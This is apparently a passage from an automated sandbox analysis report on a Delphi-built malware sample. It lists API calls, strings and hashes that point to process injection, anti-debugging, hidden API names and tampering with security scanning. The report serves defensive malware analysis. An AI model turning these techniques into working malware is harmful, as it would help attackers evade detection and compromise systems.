                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0285AA10
                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0285AA22
                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0285AA34
                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0285AA46
                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0285AA58
                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0285AA6A
                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0285AA7C
                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0285AA8E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                        • API String ID: 667068680-597814768
                        • Opcode ID: 482d416c3237a87c6414525343a4233e70031cbd279c450787ea530b272e9166
                        • Instruction ID: 513f6c24ce61d22e4230254f0d2f9c16ec9a18b05a4118359e853800e448c4d4
                        • Opcode Fuzzy Hash: 482d416c3237a87c6414525343a4233e70031cbd279c450787ea530b272e9166
                        • Instruction Fuzzy Hash: C43152BC9807349FFB55EFB8D9E5A163799BB067017000A65BC01CF249EB7894508F97
                        APIs
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        • GetThreadContext.KERNEL32(00000000,028A2420,ScanString,028A23A4,0285A774,UacInitialize,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,UacInitialize,028A23A4), ref: 0285943A
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        • SetThreadContext.KERNEL32(00000000,028A2420,ScanBuffer,028A23A4,0285A774,ScanString,028A23A4,0285A774,Initialize,028A23A4,0285A774,00000000,-00000008,028A24F8,00000004,028A24FC), ref: 0285A14F
                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028A2420,ScanBuffer,028A23A4,0285A774,ScanString,028A23A4,0285A774,Initialize,028A23A4,0285A774,00000000,-00000008,028A24F8), ref: 0285A15C
                          • Part of subcall function 02858798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                          • Part of subcall function 02858798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                          • Part of subcall function 02858798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                        • API String ID: 4175202198-51457883
                        • Opcode ID: 47abb629c399ddc029620df33f86f05bca689230ca742ccd587474b52b3fe39b
                        • Instruction ID: 48979696d76869d9dc6a67ae0ad20b577eb0b20d5bd79e52c186ed12a134e9a4
                        • Opcode Fuzzy Hash: 47abb629c399ddc029620df33f86f05bca689230ca742ccd587474b52b3fe39b
                        • Instruction Fuzzy Hash: 9AE22E3CA1112C9FEB15EB68CCD1FDE73BAAF45300F1082A1A945EB215DE749E468F52
                        APIs
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                        • GetThreadContext.KERNEL32(00000000,028A2420,ScanString,028A23A4,0285A774,UacInitialize,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,UacInitialize,028A23A4), ref: 0285943A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                        • API String ID: 1116111917-51457883
                        • Opcode ID: ad5bb4936860bcbd56df5171dd08ad8b959b633e7c77d17b8ee7c3e67f88f964
                        • Instruction ID: 5e9ebc32c9e910456f4dbc7c5b991202afd6cdd650560ac2fe1d4381b59d5067
                        • Opcode Fuzzy Hash: ad5bb4936860bcbd56df5171dd08ad8b959b633e7c77d17b8ee7c3e67f88f964
                        • Instruction Fuzzy Hash: D1E22E3CA1112C9FEB15EB68CCD1FDE73BAAF45300F1082A1A945EB215DE749E468F52
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,02846BC8,02840000,0286E790), ref: 028458D1
                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028458E8
                        • lstrcpynA.KERNEL32(?,?,?), ref: 02845918
                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 0284597C
                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459B2
                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459C5
                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459D7
                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000,0286E790), ref: 028459E3
                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8,02840000), ref: 02845A17
                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02846BC8), ref: 02845A23
                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02845A45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                        • String ID: GetLongPathNameA$\$kernel32.dll
                        • API String ID: 3245196872-1565342463
                        • Opcode ID: 1c5ecbf1fd2c483d0a25cf5b33df92d78ce7de87553a334b5a3434fde6a4a3c0
                        • Instruction ID: 84369f2dc520cb1d6e50e0af55d2af6ea3c4539ece5355ea1d537d4f89af2861
                        • Opcode Fuzzy Hash: 1c5ecbf1fd2c483d0a25cf5b33df92d78ce7de87553a334b5a3434fde6a4a3c0
                        • Instruction Fuzzy Hash: 7C41617DD0026DAFDB10DBE8CC88ADEB7BDAF19304F4445A6A548D7241DB349B448F50
                        APIs
                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02845B94
                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02845BA1
                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02845BA7
                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02845BD2
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C19
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C29
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C51
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C61
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02845C87
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02845C97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                        • API String ID: 1599918012-2375825460
                        APIs
                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                          • Part of subcall function 02857CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02857D6C
                        Strings
                        Similarity
                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                        • String ID: BCryptVerifySignature$bcrypt
                        • API String ID: 1002360270-4067648912
                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DFD2), ref: 0285DF3F
                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0285DF79
                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0285DFA6
                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0285DFAF
                        Similarity
                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                        • String ID:
                        • API String ID: 3764614163-0
                        APIs
                        • RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
                        • NtDeleteFile.NTDLL(?), ref: 0285DED5
                        Similarity
                        • API ID: Path$DeleteFileInitNameName_StringUnicode
                        • String ID:
                        • API String ID: 1459852867-0
                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
                        • NtDeleteFile.NTDLL(?), ref: 0285DED5
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Similarity
                        • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                        • String ID:
                        • API String ID: 1694942484-0
                        APIs
                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02847F75
                        Similarity
                        • API ID: DiskFreeSpace
                        • String ID:
                        • API String ID: 1705453755-0
                        APIs
                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        APIs
                        • GetVersionExA.KERNEL32(?,0286D106,00000000,0286D11E), ref: 0284B71A
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0284BDF2,00000000,0284C00B,?,?,00000000,00000000), ref: 0284A7A3
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        APIs
                        Similarity
                        • API ID: LocalTime
                        • String ID:
                        • API String ID: 481472006-0
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0284D21D
                          • Part of subcall function 0284D1E8: GetProcAddress.KERNEL32(00000000), ref: 0284D201
                        Strings
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                        • API String ID: 1646373207-1918263038
                        APIs
                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02856E5E
                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02856E6F
                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02856E7F
                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02856E8F
                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02856E9F
                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02856EAF
                        • GetProcAddress.KERNEL32 ref: 02856EBF
                        Strings
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                        • API String ID: 667068680-2233174745
                        APIs
                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028428CE
                        Strings
                        Similarity
                        • API ID: Message
                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                        • API String ID: 2030045667-32948583
                        Strings
                        • Unexpected Memory Leak, xrefs: 028428C0
                        • , xrefs: 02842814
                        • 7, xrefs: 028426A1
                        • An unexpected memory leak has occurred. , xrefs: 02842690
                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02842849
                        • The unexpected small block leaks are:, xrefs: 02842707
                        • bytes: , xrefs: 0284275D
                        Similarity
                        • API ID:
                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                        • API String ID: 0-2723507874
                        APIs
                        • GetThreadLocale.KERNEL32(00000000,0284C00B,?,?,00000000,00000000), ref: 0284BD76
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Strings
                        Similarity
                        • API ID: Locale$InfoThread
                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                        • API String ID: 4232894706-2493093252
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AE38
                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0285AE4F
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AEE3
                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 0285AEEF
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 0285AF03
                        Strings
                        Similarity
                        • API ID: Read$HandleModule
                        • String ID: KernelBase$LoadLibraryExA
                        • API String ID: 2226866862-113032527
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8,?,?,0286E7A8,0284655D,0286D30D), ref: 02844365
                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8,?,?,0286E7A8,0284655D,0286D30D), ref: 0284436B
                        • GetStdHandle.KERNEL32(000000F5,028443B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?,028A17C8), ref: 02844380
                        • WriteFile.KERNEL32(00000000,000000F5,028443B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028443F3,?,?), ref: 02844386
                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028443A4
                        Strings
                        Similarity
                        • API ID: FileHandleWrite$Message
                        • String ID: Error$Runtime error at 00000000
                        • API String ID: 1570097196-2970929446
                        APIs
                          • Part of subcall function 0284ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                          • Part of subcall function 0284ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                          • Part of subcall function 0284ACBC: GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                          • Part of subcall function 0284ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        • CharToOemA.USER32(?,?), ref: 0284AE7B
                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0284AE98
                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AE9E
                        • GetStdHandle.KERNEL32(000000F4,0284AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AEB3
                        • WriteFile.KERNEL32(00000000,000000F4,0284AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0284AEB9
                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0284AEDB
                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0284AEF1
                        Similarity
                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                        • String ID:
                        • API String ID: 185507032-0
                        APIs
                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0284E5A5
                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0284E5C1
                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0284E5FA
                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0284E677
                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0284E690
                        • VariantCopy.OLEAUT32(?,00000000), ref: 0284E6C5
                        Similarity
                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                        • String ID:
                        • API String ID: 351091851-0
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0284358A
                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028435D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028435BD
                        • RegCloseKey.ADVAPI32(?,028435E0,00000000,?,00000004,00000000,028435D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028435D3
                        Strings
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                        • API String ID: 3677997916-4173385793
                        APIs
                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                        • GetProcAddress.KERNEL32(?,?), ref: 02858125
                        Strings
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: Kernel32$sserddAcorPteG
                        • API String ID: 667068680-1372893251
                        APIs
                        • GetThreadLocale.KERNEL32(?,00000000,0284AA67,?,?,00000000), ref: 0284A9E8
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0284AA67,?,?,00000000), ref: 0284AA18
                        • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0284AA23
                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0284AA67,?,?,00000000), ref: 0284AA41
                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0284AA4C
                        Similarity
                        • API ID: Locale$InfoThread$CalendarEnum
                        • String ID:
                        • API String ID: 4102113445-0
                        APIs
                        • GetThreadLocale.KERNEL32(?,00000000,0284AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0284AAAF
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Strings
                        Similarity
                        • API ID: Locale$InfoThread
                        • String ID: eeee$ggg$yyyy
                        • API String ID: 4232894706-1253427255
                        APIs
                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02858088,?,?,00000000,?,028579FE,ntdll,00000000,00000000,02857A43,?,?,00000000), ref: 02858056
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                        • GetModuleHandleA.KERNELBASE(?), ref: 0285806A
                        Strings
                        Similarity
                        • API ID: HandleModule$AddressProc
                        • String ID: AeldnaHeludoMteG$KernelBASE
                        • API String ID: 1883125708-1952140341
                        APIs
                        • GetModuleHandleW.KERNEL32(KernelBase,?,0285F3CC,UacInitialize,028A237C,0286B40C,UacScan,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString), ref: 0285EFCE
                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0285EFE0
                        Strings
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsDebuggerPresent$KernelBase
                        • API String ID: 1646373207-2367923768
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0286D10B,00000000,0286D11E), ref: 0284C3FA
                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0284C40B
                        Strings
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                        • API String ID: 1646373207-3712701948
                        APIs
                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0284E217
                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0284E233
                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0284E2AA
                        • VariantClear.OLEAUT32(?), ref: 0284E2D3
                        Similarity
                        • API ID: ArraySafe$Bound$ClearIndexVariant
                        • String ID:
                        • API String ID: 920484758-0
                        APIs
                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        Similarity
                        • API ID: FileModuleName$LoadQueryStringVirtual
                        • String ID:
                        • API String ID: 3990497365-0
                        APIs
                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        Similarity
                        • API ID: FileModuleName$LoadQueryStringVirtual
                        • String ID:
                        • API String ID: 3990497365-0
                        APIs
                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0284955A), ref: 028494F2
                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0284955A), ref: 028494F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        Similarity
                        • API ID: DateFormatLocaleThread
                        • String ID: yyyy
                        • API String ID: 3303714858-3145165042
                        APIs
